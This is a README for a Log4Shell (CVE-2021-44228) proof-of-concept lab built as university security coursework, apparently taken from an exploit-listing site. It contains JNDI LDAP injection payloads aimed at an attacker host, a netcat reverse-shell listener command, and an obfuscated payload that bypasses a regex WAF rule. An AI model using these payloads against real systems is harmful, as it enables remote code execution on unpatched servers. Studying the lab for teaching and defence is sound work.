Share
## https://sploitus.com/exploit?id=610F8853-5D6B-5E0E-AE66-904F64A7C2CE
# TPAS Log4Shell PoC

This repository contains a Proof of Concept (PoC) for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricular unit TPAS in the Master's degree in Information Security at FCUP.

It features:
 - A React SPA frontend that simulates a generic e-commerce website with basic features such as browsing products and view basic details such as description, price, rating, etc.., provided via the dummy json api https://dummyjson.com/docs/products
 - A Spring Boot REST API backend that uses a vulnerable version of Log4j 2.14.
 - A bash script that sets up most of the attacker side of things needed to exploit Log4Shell.

To run this stack you need to:
 - On the target host:
     - Install docker
     - Replace the <target_ip> on the NEXT_PUBLIC_BACKEND_URL env var on docker-compose.yaml
     - Run docker-compose up
 - On the attacker host:
     - Install java, python and maven
     - Open the required ports, "./init.sh --help" to see the ports and what the script does
     - Run the script init.sh
     - Run a netcat listener, nc -lvnp <port>

Once everything is running:

Place this payload on the search bar (URL encoded since it will be on a GET query param):

```
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
```

Or place this payload on the headers of a request (you can use burp suite to intercept a request and tamper it):

```
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
```

On the website, there is an icon next to the user's name that allows toggling between sanitizing the logged string using the regular expression \\$\\{jndi:.*?} or not. By default, sanitization is disabled, represented by a red demon icon. When sanitization is enabled, the icon changes to a green smiley face.

This feature can be used as a way of simulating a WAF bypass, you can add more regular expressions on the backend's LoggerManager.java class.

Here's a payload that will not be matched by the current regex:

```
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
```